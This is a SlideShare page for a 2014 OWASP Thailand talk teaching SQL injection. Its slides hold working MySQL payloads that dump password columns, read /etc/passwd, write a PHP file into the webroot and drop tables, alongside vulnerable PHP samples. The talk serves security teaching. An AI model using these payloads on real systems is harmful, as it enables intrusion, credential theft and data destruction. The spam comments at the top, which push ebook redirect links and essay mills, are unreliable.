Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

16,593 views

Published on

Topic: SQL Injection 101 : It is not just about ' or '1'='1
Speaker: Pichaya Morimoto
Event: OWASP Thailand Meeting 3/2014
Date: Auguest 28, 2014

Published in: Software
  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://redirect.is/fyxsb0u } ......................................................................................................................... Download Full EPUB Ebook here { https://redirect.is/fyxsb0u } ......................................................................................................................... Download Full doc Ebook here { https://redirect.is/fyxsb0u } ......................................................................................................................... Download PDF EBOOK here { https://redirect.is/fyxsb0u } ......................................................................................................................... Download EPUB Ebook here { https://redirect.is/fyxsb0u } ......................................................................................................................... Download doc Ebook here { https://redirect.is/fyxsb0u } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • A professional Paper writing services can alleviate your stress in writing a successful paper and take the pressure off you to hand it in on time. Check out, please ⇒ www.WritePaper.info ⇐
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Hi there! I just wanted to share a list of sites that helped me a lot during my studies: .................................................................................................................................... www.EssayWrite.best - Write an essay .................................................................................................................................... www.LitReview.xyz - Summary of books .................................................................................................................................... www.Coursework.best - Online coursework .................................................................................................................................... www.Dissertations.me - proquest dissertations .................................................................................................................................... www.ReMovie.club - Movies reviews .................................................................................................................................... www.WebSlides.vip - Best powerpoint presentations .................................................................................................................................... www.WritePaper.info - Write a research paper .................................................................................................................................... www.EddyHelp.com - Homework help online .................................................................................................................................... www.MyResumeHelp.net - Professional resume writing service .................................................................................................................................. www.HelpWriting.net - Help with writing any papers ......................................................................................................................................... Save so as not to lose
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Have u ever tried external professional writing services like ⇒ HelpWriting.net ⇐ ? I did and I am more than satisfied.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

  1. 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  2. 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  3. 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
  4. 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
  5. 5. Very Popular among Hackers
  6. 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
  7. 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
  8. 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
  9. 9. Tool == Super Easy ?
  10. 10. Tool == Super Easy ?
  11. 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
  12. 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
  13. 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  14. 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
  15. 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
  16. 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
  17. 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
  18. 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
  19. 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
  20. 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
  21. 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
  22. 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
  23. 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
  24. 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  25. 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
  26. 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
  27. 27. Example of Vulnerable Code
  28. 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
  29. 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  30. 30. Time-based blind : Exploit sleep() executed !
  31. 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
  32. 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
  33. 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
  34. 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
  35. 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
  36. 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
  37. 37. Example of Vulnerable Code
  38. 38. Stacked queries : Exploit
  39. 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
  40. 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  41. 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  42. 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
  43. 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
  44. 44. Next Time :s
  45. 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/

×